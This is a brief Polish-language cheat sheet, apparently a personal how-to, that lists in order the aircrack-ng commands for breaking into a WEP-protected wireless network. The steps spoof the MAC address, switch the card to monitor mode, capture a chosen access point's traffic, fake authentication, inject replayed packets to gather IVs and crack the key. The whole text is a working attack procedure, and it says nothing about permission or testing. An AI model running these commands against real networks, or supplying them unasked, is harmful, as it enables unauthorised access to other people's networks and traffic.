Sprawdzamy dostepne interfejsy: airmon-ng
Zatrzymujemy aktualny tryb karty: airmon-ng stop wlan0
Zatrzymujemy interfejs: ifconfig wlan0 down
Zmieniamy mac adres: macchanger - -mac 00:11:22:33:44:55 wlan0
Uruchamiamy interfejs w trybie monitoringu: airmon-ng start wlan0
Sprawdzamy dostępne AP i ich parametry: airodump-ng wlan0
Crtl + c
Uruchamiamy na wybranym kanale: airodump-ng -c [nr_kanalu] -w [nazwa pliku] - -bssid [bssid_ap] wlan0
Nowe okno konsoli
Uwierzytelniamy się AP: aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55 (opcjonalnie -e [essid]) wlan0
Uruchamiamy wstrzykiwanie pakietów: aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:55 wlan0
Przy przy 15-20 tys IVS możemy przystepować do ataku. Otwieramy nowe okno konsoli
Łamiemy hasło: aircrack-ng -n 64 -b [bssid] [nazwa pliku].cap (to nazwa pliku w którym są zebrane ivs)
GOTOWE